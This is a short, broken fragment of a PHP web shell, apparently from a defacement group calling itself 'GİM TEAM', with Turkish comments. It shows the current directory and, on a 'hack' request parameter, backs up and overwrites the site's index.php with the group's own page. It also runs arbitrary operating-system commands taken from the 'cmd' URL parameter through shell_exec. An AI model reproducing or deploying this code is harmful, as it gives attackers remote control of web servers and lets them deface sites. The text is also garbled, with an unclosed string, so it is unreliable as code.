GİM TEAM - Sistem Kontrolü Aktif
";
echo "Dizin: " . getcwd() . "
";
// 1. Ana dizindeki mevcut index'i yedekle ve değiştir
if (isset($_GET['hack'])) {
$target = "index.php";
$backup = "index_old.php";
// Senin hazırladığın Matrix efektli HTML içeriği (Buraya kendi kodunu yapıştır)
$gim_index = '
" . shell_exec($_GET['cmd']) . ""; } ?>